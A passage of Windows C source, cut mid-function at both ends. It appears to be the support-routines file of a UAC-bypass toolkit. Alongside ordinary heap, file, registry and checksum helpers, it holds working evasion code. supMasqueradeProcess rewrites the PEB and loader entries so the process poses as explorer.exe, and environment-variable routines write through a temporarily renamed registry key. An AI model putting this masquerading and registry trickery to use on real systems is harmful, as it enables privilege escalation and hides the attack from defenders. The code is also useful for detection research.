    _Out_opt_ NTSTATUS* Status)
{
    RtlSecureZeroMemory(Memory, MemorySize);
    return supVirtualFree(Memory, Status);
}

/*
* supHeapAlloc
*
* Purpose:
*
* Wrapper for RtlAllocateHeap with ucmHeap.
*
*/
PVOID FORCEINLINE supHeapAlloc(
    _In_ SIZE_T Size)
{
    return RtlAllocateHeap(g_ctx->ucmHeap, HEAP_ZERO_MEMORY, Size);
}

/*
* supHeapFree
*
* Purpose:
*
* Wrapper for RtlFreeHeap with ucmHeap.
*
*/
BOOL FORCEINLINE supHeapFree(
    _In_ PVOID Memory)
{
    return RtlFreeHeap(g_ctx->ucmHeap, 0, Memory);
}

/*
* supIsProcess32bit
*
* Purpose:
*
* Return TRUE if given process is under WOW64, FALSE otherwise.
*
*/
BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess
)
{
    NTSTATUS status;
    PROCESS_EXTENDED_BASIC_INFORMATION pebi;

    if (hProcess == NULL) {
        return FALSE;
    }

    //query if this is wow64 process
    RtlSecureZeroMemory(&pebi, sizeof(pebi));
    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
    if (NT_SUCCESS(status)) {
        return (pebi.IsWow64Process == 1);
    }
    return FALSE;
}

/*
* supGetElevationType
*
* Purpose:
*
* Returns client elevation type.
*
*/
BOOL supGetElevationType(
    _Out_ TOKEN_ELEVATION_TYPE* lpType
)
{
    HANDLE hToken = NULL;
    NTSTATUS status;
    ULONG bytesRead = 0;
    TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;

    status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
    if (NT_SUCCESS(status)) {
        status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,
            sizeof(TOKEN_ELEVATION_TYPE), &bytesRead);
        NtClose(hToken);
    }

    supSetLastErrorFromNtStatus(status);

    if (lpType)
        *lpType = TokenType;

    return (NT_SUCCESS(status));
}

/*
* supWriteBufferToFile
*
* Purpose:
*
* Create new file and write buffer to it.
*
*/
BOOL supWriteBufferToFile(
    _In_ LPCWSTR lpFileName,
    _In_opt_ PVOID Buffer,
    _In_ DWORD BufferSize
)
{
    HANDLE hFile;
    DWORD bytesIO = 0;

    if ((Buffer == NULL) || (BufferSize == 0))
        return FALSE;

    hFile = CreateFile(lpFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if (hFile != INVALID_HANDLE_VALUE) {
        WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
        CloseHandle(hFile);
    }
    else {
#ifdef _DEBUG
        supDebugPrint(TEXT("CreateFile"), GetLastError());
#endif
        return FALSE;
    }

    return (bytesIO == BufferSize);
}

/*
* supDebugPrint
*
* Purpose:
*
* Write formatted debug output.
*
*/
VOID supDebugPrint(
    _In_ LPCWSTR ApiName,
    _In_ DWORD status
)
{
    HANDLE Heap;
    LPWSTR lpBuffer;
    SIZE_T sz;

    sz = MAX_PATH;
    if (ApiName)
        sz += _strlen(ApiName);

    if (g_ctx == NULL) {
        Heap = NtCurrentPeb()->ProcessHeap;
    }
    else {
        Heap = g_ctx->ucmHeap;
    }

    lpBuffer = (LPWSTR)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, sz * sizeof(WCHAR));
    if (lpBuffer) {
        _strcpy(lpBuffer, TEXT("[UCM] "));
        if (ApiName) {
            _strcat(lpBuffer, ApiName);
        }
        _strcat(lpBuffer, TEXT(" code = 0x"));
        ultohex(status, _strend(lpBuffer));
        _strcat(lpBuffer, TEXT("\n"));
        OutputDebugString(lpBuffer);
        RtlFreeHeap(Heap, 0, lpBuffer);
    }
}

/*
* supRegWriteValue
*
* Purpose:
*
* Write value to the registry.
*
*/
NTSTATUS supRegWriteValue(
    _In_ HANDLE hKey,
    _In_opt_ LPWSTR ValueName,
    _In_ DWORD ValueType,
    _In_ PVOID ValueData,
    _In_ ULONG ValueDataSize
)
{
    UNICODE_STRING usValue;

    if (ValueName) {
        RtlInitUnicodeString(&usValue, ValueName);
    }
    else {
        RtlInitEmptyUnicodeString(&usValue, NULL, 0);
    }

    return NtSetValueKey(hKey, &usValue, 0, ValueType, ValueData, ValueDataSize);
}

/*
* supRegCurrentUserDeleteSubKeyValue
*
* Purpose:
*
* Remove value of the given subkey.
*
*/
NTSTATUS supRegCurrentUserDeleteSubKeyValue(
    _In_ LPWSTR SubKey,
    _In_ LPWSTR ValueName)
{
    NTSTATUS ntStatus;
    HANDLE hRootKey = NULL, hSubKey = NULL;
    OBJECT_ATTRIBUTES obja;
    UNICODE_STRING usSubKey, usValueName, usRootKey;

    ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
    if (NT_SUCCESS(ntStatus)) {

        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
        ntStatus = NtOpenKey(&hRootKey, MAXIMUM_ALLOWED, &obja);
        if (NT_SUCCESS(ntStatus)) {

            RtlInitUnicodeString(&usSubKey, SubKey);
            obja.RootDirectory = hRootKey;
            obja.ObjectName = &usSubKey;

            ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
            if (NT_SUCCESS(ntStatus)) {
                RtlInitUnicodeString(&usValueName, ValueName);
                ntStatus = NtDeleteValueKey(hSubKey, &usValueName);
                NtClose(hSubKey);
            }

            NtClose(hRootKey);
        }

        RtlFreeUnicodeString(&usRootKey);
    }

    return ntStatus;
}

/*
* supRegReadValue
*
* Purpose:
*
* Read given value to output buffer.
* Returned Buffer must be released with RtlFreeHeap after use.
*
*/
NTSTATUS supRegReadValue(
    _In_ HANDLE hKey,
    _In_ LPWSTR ValueName,
    _In_ DWORD ValueType,
    _Out_ PVOID* Buffer,
    _Out_ ULONG* BufferSize,
    _In_opt_ HANDLE hHeap
)
{
    KEY_VALUE_PARTIAL_INFORMATION* kvpi;
    UNICODE_STRING usName;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
    ULONG Length = 0;
    PVOID CopyBuffer = NULL;
    HANDLE Heap;

    *Buffer = NULL;
    *BufferSize = 0;

    if (hHeap == NULL)
        Heap = NtCurrentPeb()->ProcessHeap;
    else
        Heap = hHeap;

    RtlInitUnicodeString(&usName, ValueName);
    Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, NULL, 0, &Length);
    if (Status == STATUS_BUFFER_TOO_SMALL) {

        kvpi = (KEY_VALUE_PARTIAL_INFORMATION*)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, Length);
        if (kvpi) {

            Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, kvpi, Length, &Length);
            if (NT_SUCCESS(Status)) {

                if (kvpi->Type == ValueType) {

                    CopyBuffer = RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, kvpi->DataLength);
                    if (CopyBuffer) {
                        RtlCopyMemory(CopyBuffer, kvpi->Data, kvpi->DataLength);
                        *Buffer = CopyBuffer;
                        *BufferSize = kvpi->DataLength;
                        Status = STATUS_SUCCESS;
                    }
                    else {
                        Status = STATUS_NO_MEMORY;
                    }
                }
                else {
                    Status = STATUS_OBJECT_TYPE_MISMATCH;
                }
            }
            RtlFreeHeap(Heap, 0, kvpi);
        }
        else {
            Status = STATUS_NO_MEMORY;
        }
    }

    return Status;
}

/*
* supReadFileToBuffer
*
* Purpose:
*
* Read file to buffer. Release the returned buffer with supVirtualFree when it is no longer needed.
*
*/
PBYTE supReadFileToBuffer(
    _In_ LPCWSTR lpFileName,
    _Inout_opt_ LPDWORD lpBufferSize
)
{
    NTSTATUS status;
    HANDLE hFile = NULL;
    PBYTE Buffer = NULL;
    SIZE_T sz = 0;
    UNICODE_STRING usName;
    OBJECT_ATTRIBUTES attr;
    IO_STATUS_BLOCK iost;
    FILE_STANDARD_INFORMATION fi;

    do {

        if (lpFileName == NULL)
            return NULL;

        if (!RtlDosPathNameToNtPathName_U(lpFileName, &usName, NULL, NULL))
            break;

        InitializeObjectAttributes(&attr, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);

        status = NtCreateFile(
            &hFile,
            FILE_READ_DATA | SYNCHRONIZE,
            &attr,
            &iost,
            NULL,
            FILE_ATTRIBUTE_NORMAL,
            FILE_SHARE_READ,
            FILE_OPEN,
            FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
            NULL,
            0);

        RtlFreeUnicodeString(&usName);

        if (!NT_SUCCESS(status)) {
            break;
        }

        RtlSecureZeroMemory(&fi, sizeof(fi));

        status = NtQueryInformationFile(
            hFile,
            &iost,
            &fi,
            sizeof(FILE_STANDARD_INFORMATION),
            FileStandardInformation);

        if (!NT_SUCCESS(status))
            break;

        sz = (SIZE_T)fi.EndOfFile.LowPart;

        Buffer = (PBYTE)supVirtualAlloc(
            &sz,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            &status);

        if (NT_SUCCESS(status)) {

            status = NtReadFile(
                hFile,
                NULL,
                NULL,
                NULL,
                &iost,
                Buffer,
                fi.EndOfFile.LowPart,
                NULL,
                NULL);

            if (NT_SUCCESS(status)) {
                if (lpBufferSize)
                    *lpBufferSize = fi.EndOfFile.LowPart;
            }
            else {
                supVirtualFree(Buffer, NULL);
                Buffer = NULL;
            }
        }

    } while (FALSE);

    if (hFile != NULL) {
        NtClose(hFile);
    }

    return Buffer;
}

/*
* supRunProcess3
*
* Purpose:
*
* ShellExecuteEx given process with given parameters and return handle to it.
*
*/
HANDLE supRunProcess3(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters,
    _In_opt_ LPCWSTR lpVerb,
    _In_ INT nShow
)
{
    SHELLEXECUTEINFO shinfo;

    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_FLAG_NO_UI | SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpFile = lpFile;
    shinfo.lpParameters = lpParameters;
    shinfo.nShow = nShow;
    shinfo.lpVerb = lpVerb;

    if (ShellExecuteEx(&shinfo))
        return shinfo.hProcess;

    return NULL;
}

/*
* supRunProcess2
*
* Purpose:
*
* Execute given process with given parameters and wait if specified.
*
*/
BOOL supRunProcess2(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters,
    _In_opt_ LPCWSTR lpVerb,
    _In_ INT nShow,
    _In_ ULONG mTimeOut
)
{
    BOOL bResult = FALSE;
    HANDLE hProcess = supRunProcess3(lpFile, lpParameters, lpVerb, nShow);

    if (hProcess) {
        if (mTimeOut != 0) {
            if (WaitForSingleObject(hProcess, mTimeOut) == WAIT_TIMEOUT)
                TerminateProcess(hProcess, WAIT_TIMEOUT);
        }
        CloseHandle(hProcess);
        bResult = TRUE;
    }

    return bResult;
}

/*
* supRunProcess
*
* Purpose:
*
* Execute given process with given parameters.
*
*/
BOOL supRunProcess(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters
)
{
    return supRunProcess2(lpFile, lpParameters, NULL, SW_SHOW, SUPRUNPROCESS_TIMEOUT_DEFAULT);
}

/*
* supCopyMemory
*
* Purpose:
*
* Copies bytes between buffers.
*
* dest - Destination buffer
* cbdest - Destination buffer size in bytes
* src - Source buffer
* cbsrc - Source buffer size in bytes
*
*/
void supCopyMemory(
    _Inout_ void* dest,
    _In_ size_t cbdest,
    _In_ const void* src,
    _In_ size_t cbsrc
)
{
    char* d = (char*)dest;
    const char* s = (const char*)src;

    if ((dest == 0) || (src == 0) || (cbdest == 0))
        return;

    // Never copy more than the destination can hold.
    if (cbdest < cbsrc)
        cbsrc = cbdest;

    while (cbsrc > 0) {
        *d++ = *s++;
        cbsrc--;
    }
}

/*
* supQueryEnvironmentVariableOffset
*
* Purpose:
*
* Return offset to the given environment variable.
*
*/
LPWSTR supQueryEnvironmentVariableOffset(
    _In_ PUNICODE_STRING Value
)
{
    UNICODE_STRING str1;
    PWCHAR EnvironmentBlock, ptr;

    EnvironmentBlock = (PWCHAR)RtlGetCurrentPeb()->ProcessParameters->Environment;
    ptr = EnvironmentBlock;

    do {
        if (*ptr == 0)
            return NULL;

        RtlInitUnicodeString(&str1, ptr);
        if (RtlPrefixUnicodeString(Value, &str1, TRUE))
            break;

        ptr += _strlen(ptr) + 1;

    } while (1);

    return (ptr + Value->Length / sizeof(WCHAR));
}

/*
* supChkSum
*
* Purpose:
*
* Calculate partial checksum for given buffer.
*
*/
USHORT supChkSum(
    ULONG PartialSum,
    PUSHORT Source,
    ULONG Length
)
{
    while (Length--) {
        PartialSum += *Source++;
        PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);
    }
    return (USHORT)(((PartialSum >> 16) + PartialSum) & 0xffff);
}

/*
* supCalculateCheckSumForMappedFile
*
* Purpose:
*
* Calculate PE file checksum.
*
*/
DWORD supCalculateCheckSumForMappedFile(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength
)
{
    PUSHORT AdjustSum;
    PIMAGE_NT_HEADERS NtHeaders;
    USHORT PartialSum;
    ULONG CheckSum;

    PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);

    NtHeaders = RtlImageNtHeader(BaseAddress);
    if (NtHeaders != NULL) {
        // Subtract the two 16-bit halves of the stored CheckSum field,
        // so the result does not depend on the value already in the header.
        AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);
        PartialSum -= (PartialSum < AdjustSum[0]);
        PartialSum -= AdjustSum[0];
        PartialSum -= (PartialSum < AdjustSum[1]);
        PartialSum -= AdjustSum[1];
    }
    else {
        PartialSum = 0;
    }

    CheckSum = (ULONG)PartialSum + FileLength;
    return CheckSum;
}

/*
* supVerifyMappedImageMatchesChecksum
*
* Purpose:
*
* Calculate PE file checksum and compare it with checksum in PE header.
*
*/
BOOLEAN supVerifyMappedImageMatchesChecksum(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength
)
{
    PIMAGE_NT_HEADERS NtHeaders;
    ULONG HeaderSum;
    ULONG CheckSum;

    CheckSum = supCalculateCheckSumForMappedFile(BaseAddress, FileLength);

    NtHeaders = RtlImageNtHeader(BaseAddress);
    if (NtHeaders) {
        HeaderSum = NtHeaders->OptionalHeader.CheckSum;
    }
    else {
        HeaderSum = FileLength;
    }

    return (CheckSum == HeaderSum);
}

/*
* supSetCheckSumForMappedFile
*
* Purpose:
*
* Set checksum value to PE header.
*
*/
BOOLEAN supSetCheckSumForMappedFile(
    _In_ PVOID BaseAddress,
    _In_ ULONG CheckSum
)
{
    PIMAGE_NT_HEADERS NtHeaders;

    NtHeaders = RtlImageNtHeader(BaseAddress);
    if (NtHeaders) {
        NtHeaders->OptionalHeader.CheckSum = CheckSum;
        return TRUE;
    }

    return FALSE;
}

/*
* supLdrQueryResourceDataEx
*
* Purpose:
*
* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
*
*/
NTSTATUS supLdrQueryResourceDataEx(
    _In_ ULONG_PTR ResourceId,
    _In_ PVOID DllHandle,
    _Out_ PULONG DataSize,
    _Out_ PVOID* Data
)
{
    NTSTATUS status;
    ULONG_PTR IdPath[3];
    IMAGE_RESOURCE_DATA_ENTRY* DataEntry;
    ULONG SizeOfData = 0;

    if (DataSize)
        *DataSize = 0;

    if (DllHandle == NULL) {
        return STATUS_INVALID_PARAMETER_2;
    }

    IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
    IdPath[1] = ResourceId;           //id
    IdPath[2] = 0;                    //lang

    status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
    if (NT_SUCCESS(status)) {
        status = LdrAccessResource(DllHandle, DataEntry, Data, &SizeOfData);
        if (NT_SUCCESS(status)) {
            if (DataSize) {
                *DataSize = SizeOfData;
            }
        }
    }
    return status;
}

/*
* supLdrQueryResourceData
*
* Purpose:
*
* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
*
*/
PBYTE supLdrQueryResourceData(
    _In_ ULONG_PTR ResourceId,
    _In_ PVOID DllHandle,
    _Out_ PULONG DataSize
)
{
    NTSTATUS status;
    PBYTE Data = NULL;

    status = supLdrQueryResourceDataEx(ResourceId, DllHandle, DataSize, &Data);
    if (NT_SUCCESS(status))
        return Data;

    return NULL;
}

/*
* supSetLastErrorFromNtStatus
*
* Purpose:
*
* Convert NTSTATUS to a Win32 error code and set it as the last error.
*
*/
VOID supSetLastErrorFromNtStatus(
    _In_ NTSTATUS LastNtStatus
)
{
    DWORD dwErrorCode;
#ifdef _WIN64
    dwErrorCode = RtlNtStatusToDosErrorNoTeb(LastNtStatus);
#else
    dwErrorCode = RtlNtStatusToDosError(LastNtStatus);
#endif
    SetLastError(dwErrorCode);
}

static PWSTR g_lpszExplorer = NULL;

typedef struct _LDR_BACKUP {
    PWSTR ImagePathName;
    PWSTR CommandLine;
    PWSTR lpFullDllName;
    PWSTR lpBaseDllName;
} LDR_BACKUP, * PLDR_BACKUP;

static LDR_BACKUP g_LdrBackup;

/*
* supxLdrEnumModulesCallback
*
* Purpose:
*
* LdrEnumerateLoadedModules callback.
*
*/
VOID NTAPI supxLdrEnumModulesCallback(
    _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
    _In_ PVOID Context,
    _Inout_ BOOLEAN* StopEnumeration
)
{
    PPEB Peb = NtCurrentPeb();
    PWSTR FullDllName, BaseDllName;
    BOOL Restore = PtrToInt(Context);

    if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {

        if (Restore) {
            FullDllName = g_LdrBackup.lpFullDllName;
            BaseDllName = g_LdrBackup.lpBaseDllName;
        }
        else {
            g_LdrBackup.lpBaseDllName = DataTableEntry->BaseDllName.Buffer;
            g_LdrBackup.lpFullDllName = DataTableEntry->FullDllName.Buffer;
            FullDllName = g_lpszExplorer;
            BaseDllName = EXPLORER_EXE;
        }

        RtlInitUnicodeString(&DataTableEntry->FullDllName, FullDllName);
        RtlInitUnicodeString(&DataTableEntry->BaseDllName, BaseDllName);

        *StopEnumeration = TRUE;
    }
    else {
        *StopEnumeration = FALSE;
    }
}

/*
* supMasqueradeProcess
*
* Purpose:
*
* Fake/Restore current process information.
*
*/
VOID supMasqueradeProcess(
    _In_ BOOL Restore
)
{
    NTSTATUS Status;
    PPEB Peb = NtCurrentPeb();
    SIZE_T RegionSize;
    PWSTR ImageFileName, CommandLine;

    if (Restore == FALSE) {

        g_lpszExplorer = NULL;
        RegionSize = PAGE_SIZE;

        Status = NtAllocateVirtualMemory(
            NtCurrentProcess(),
            (PVOID*)&g_lpszExplorer,
            0,
            &RegionSize,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_READWRITE);

        if (NT_SUCCESS(Status)) {
            _strcpy(g_lpszExplorer, g_ctx->szSystemRoot);
            _strcat(g_lpszExplorer, EXPLORER_EXE);
        }
        else {
            supSetLastErrorFromNtStatus(Status);
            return;
        }
    }

    RtlAcquirePebLock();

    if (Restore) {
        CommandLine = g_LdrBackup.CommandLine;
        ImageFileName = g_LdrBackup.ImagePathName;
    }
    else {
        g_LdrBackup.ImagePathName = Peb->ProcessParameters->ImagePathName.Buffer;
        g_LdrBackup.CommandLine = Peb->ProcessParameters->CommandLine.Buffer;
        ImageFileName = g_lpszExplorer;
        CommandLine = EXPLORER_EXE;
    }

    RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, ImageFileName);
    RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, CommandLine);

    if (Restore) {
        RegionSize = 0;
        NtFreeVirtualMemory(
            NtCurrentProcess(),
            (PVOID*)&g_lpszExplorer,
            &RegionSize,
            MEM_RELEASE);
        g_lpszExplorer = NULL;
    }

    RtlReleasePebLock();

    LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, IntToPtr(Restore));
}

/*
* supExpandEnvironmentStrings
*
* Purpose:
*
* Native ExpandEnvironmentStrings.
*
*/
DWORD supExpandEnvironmentStrings(
    _In_ LPCWSTR lpSrc,
    _In_ LPWSTR lpDst,
    _In_ DWORD nSize
)
{
    NTSTATUS Status;
    UNICODE_STRING Source, Destination;
    ULONG Length;
    DWORD iSize;

    if (nSize > (MAXUSHORT >> 1) - 2) {
        iSize = (MAXUSHORT >> 1) - 2;
    }
    else {
        iSize = nSize;
    }

    RtlInitUnicodeString(&Source, lpSrc);
    Destination.Buffer = lpDst;
    Destination.Length = 0;
    Destination.MaximumLength = (USHORT)(iSize * sizeof(WCHAR));
    Length = 0;
    Status = RtlExpandEnvironmentStrings_U(NULL,
        &Source,
        &Destination,
        &Length
    );
    if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {
        return (DWORD)(Length / sizeof(WCHAR));
    }
    else {
        supSetLastErrorFromNtStatus(Status);
        return 0;
    }
}

/*
* sxsFilePathNoSlash
*
* Purpose:
*
* Same as _filepath except it does not return the trailing slash.
*
*/
wchar_t* sxsFilePathNoSlash(
    const wchar_t* fname,
    wchar_t* fpath
)
{
    wchar_t* p = (wchar_t*)fname, * p0 = (wchar_t*)fname, * p1 = (wchar_t*)fpath;

    if ((fname == 0) || (fpath == NULL))
        return 0;

    while (*fname != (wchar_t)0) {
        if (*fname == '\\')
            p = (wchar_t*)fname;
        fname++;
    }

    while (p0 < p) {
        *p1 = *p0;
        p1++;
        p0++;
    }

    *p1 = 0;

    return fpath;
}

/*
* sxsFindLoaderEntry
*
* Purpose:
*
* Return loader entry filename for sxs dll.
*
*/
BOOL sxsFindLoaderEntry(
    _In_ PSXS_SEARCH_CONTEXT Context
)
{
    NTSTATUS Status;
    HANDLE hDll = NULL;
    UNICODE_STRING usDll;
    PLDR_DATA_TABLE_ENTRY LdrTableEntry = NULL;

    RtlInitUnicodeString(&usDll, Context->DllName);

    Status = LdrGetDllHandle(
        NULL,
        NULL,
        &usDll,
        &hDll);

    if (NT_SUCCESS(Status)) {

        Status = LdrFindEntryForAddress(
            hDll,
            &LdrTableEntry);

        if (NT_SUCCESS(Status)) {

            if (_strstri(
                LdrTableEntry->FullDllName.Buffer,
                L".local") == NULL)
            {
                if (_strstri(
                    LdrTableEntry->FullDllName.Buffer,
                    Context->SxsKey))
                {
                    sxsFilePathNoSlash(
                        LdrTableEntry->FullDllName.Buffer,
                        Context->FullDllPath);
                }
                else
                    Status = STATUS_NOT_FOUND;
            }
            else
                Status = STATUS_TOO_LATE;
        }
    }

    return NT_SUCCESS(Status);
}

/*
* supxDeleteKeyRecursive
*
* Purpose:
*
* Delete key and all its subkeys/values.
*
*/
BOOL supxDeleteKeyRecursive(
    _In_ HKEY hKeyRoot,
    _In_ LPWSTR lpSubKey)
{
    LPWSTR lpEnd;
    LONG lResult;
    DWORD dwSize;
    WCHAR szName[MAX_PATH + 1];
    HKEY hKey;
    FILETIME ftWrite;

    //
    // Attempt to delete key as is.
    //
    lResult = RegDeleteKey(hKeyRoot, lpSubKey);
    if (lResult == ERROR_SUCCESS)
        return TRUE;

    //
    // Try to open key to check if it exists.
    //
    lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
    if (lResult != ERROR_SUCCESS) {
        if (lResult == ERROR_FILE_NOT_FOUND)
            return TRUE;
        else
            return FALSE;
    }

    //
    // Add slash to the key path if not present.
    //
    lpEnd = _strend(lpSubKey);
    if (*(lpEnd - 1) != TEXT('\\')) {
        *lpEnd = TEXT('\\');
        lpEnd++;
        *lpEnd = TEXT('\0');
    }

    //
    // Enumerate subkeys and call this func for each.
    //
    dwSize = MAX_PATH;
    lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL, NULL, NULL, &ftWrite);
    if (lResult == ERROR_SUCCESS) {

        do {

            _strncpy(lpEnd, MAX_PATH, szName, MAX_PATH);

            if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey))
                break;

            dwSize = MAX_PATH;
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL, NULL, NULL, &ftWrite);

        } while (lResult == ERROR_SUCCESS);
    }

    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

    //
    // Delete current key, all its subkeys should be already removed.
    //
    lResult = RegDeleteKey(hKeyRoot, lpSubKey);
    if (lResult == ERROR_SUCCESS)
        return TRUE;

    return FALSE;
}

/*
* supRegDeleteKeyRecursive
*
* Purpose:
*
* Delete key and all its subkeys/values.
*
* Remark:
*
* SubKey should not be longer than 260 chars.
*
*/
BOOL supRegDeleteKeyRecursive(
    _In_ HKEY hKeyRoot,
    _In_ LPCWSTR lpSubKey)
{
    WCHAR szKeyName[MAX_PATH * 2];
    RtlSecureZeroMemory(szKeyName, sizeof(szKeyName));
    _strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH);
    return supxDeleteKeyRecursive(hKeyRoot, szKeyName);
}

/*
* supSetEnvVariableEx
*
* Purpose:
*
* Remove or set current user environment variable (NTAPI variant).
*
*/
BOOL supSetEnvVariableEx(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData
)
{
    BOOL bNameAllocated = FALSE;
    DWORD cbData;
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
    LPWSTR lpSubKey;
    HANDLE hRoot = NULL, hSubKey = NULL;
    OBJECT_ATTRIBUTES obja;
    UNICODE_STRING usRootKey, usSubKey, usValueName;

    usRootKey.Buffer = NULL;

    do {
        if (lpVariableName == NULL) {
            //
            // Nothing to set/remove.
            //
            break;
        }

        if ((lpVariableData == NULL) && (fRemove == FALSE))
            break;

        if (lpKeyName == NULL)
            lpSubKey = L"Environment";
        else
            lpSubKey = lpKeyName;

        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);
        if (!NT_SUCCESS(ntStatus))
            break;

        bNameAllocated = TRUE;

        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
        ntStatus = NtOpenKey(&hRoot, MAXIMUM_ALLOWED, &obja);
        if (!NT_SUCCESS(ntStatus))
            break;

        RtlInitUnicodeString(&usSubKey, lpSubKey);
        obja.RootDirectory = hRoot;
        obja.ObjectName = &usSubKey;

        ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);
        if (!NT_SUCCESS(ntStatus))
            break;

        RtlInitUnicodeString(&usValueName, lpVariableName);

        if (fRemove) {
            ntStatus = NtDeleteValueKey(hSubKey, &usValueName);
        }
        else {
            cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
            ntStatus = NtSetValueKey(hSubKey, &usValueName, 0, REG_SZ, (BYTE*)lpVariableData, cbData);
        }

        if (NT_SUCCESS(ntStatus)) {
            SendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, (LPARAM)lpVariableName, SMTO_BLOCK, 1000, NULL);
        }

    } while (FALSE);

    if (hSubKey) NtClose(hSubKey);
    if (hRoot) NtClose(hRoot);
    if (bNameAllocated) RtlFreeUnicodeString(&usRootKey);

    return NT_SUCCESS(ntStatus);
}

/*
* supSetEnvVariable
*
* Purpose:
*
* Remove or set current user environment variable.
*
*/
BOOL supSetEnvVariable(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData
)
{
    BOOL bResult = FALSE;
    HKEY hKey = NULL;
    DWORD cbData;
    LPWSTR lpSubKey;

    do {
        if (lpVariableName == NULL)
            break;

        if (lpKeyName == NULL)
            lpSubKey = L"Environment";
        else
            lpSubKey = lpKeyName;

        if ((lpVariableData == NULL) && (fRemove == FALSE))
            break;

        if (RegOpenKey(HKEY_CURRENT_USER, lpSubKey, &hKey) != ERROR_SUCCESS)
            break;

        if (fRemove) {
            bResult = (RegDeleteValue(hKey, lpVariableName) == ERROR_SUCCESS);
        }
        else {
            cbData = (DWORD)((1 + _strlen(lpVariableData)) * sizeof(WCHAR));
            bResult = (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData, cbData) == ERROR_SUCCESS);
        }

        if (bResult) {
            SendMessageTimeout(HWND_BROADCAST, WM_SETTINGCHANGE, 0, (LPARAM)lpVariableName, SMTO_BLOCK, 1000, NULL);
        }

    } while (FALSE);

    if (hKey != NULL) {
        RegFlushKey(hKey);
        RegCloseKey(hKey);
    }

    return bResult;
}

/*
* supSetEnvVariable2
*
* Purpose:
*
* Remove or set current user environment variable (variant that operates on a temporarily renamed key).
*
*/
BOOL supSetEnvVariable2(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData
)
{
    BOOL bResult = FALSE;
    HKEY hKey = NULL;
    DWORD cbData;
    LPWSTR lpSubKey;
    LARGE_INTEGER liValue;
    ULONG seedValue;
    WCHAR szNewKey[MAX_PATH];

    do {
        if (lpVariableName == NULL)
            break;

        if (lpKeyName == NULL)
            lpSubKey = L"Environment";
        else
            lpSubKey = lpKeyName;

        if ((lpVariableData == NULL) && (fRemove == FALSE))
            break;

        RtlSecureZeroMemory(&szNewKey, sizeof(szNewKey));

        seedValue = GetTickCount();
        liValue.LowPart = RtlRandomEx(&seedValue);
        seedValue = ~GetTickCount();
        liValue.HighPart = RtlRandomEx(&seedValue);

        supBinTextEncode(liValue.QuadPart, szNewKey);

        if (ERROR_SUCCESS == RegRenameKey(HKEY_CURRENT_USER, lpSubKey, szNewKey)) {

            if (ERROR_SUCCESS == RegOpenKey(HKEY_CURRENT_USER, szNewKey, &hKey)) {

                if (fRemove) {
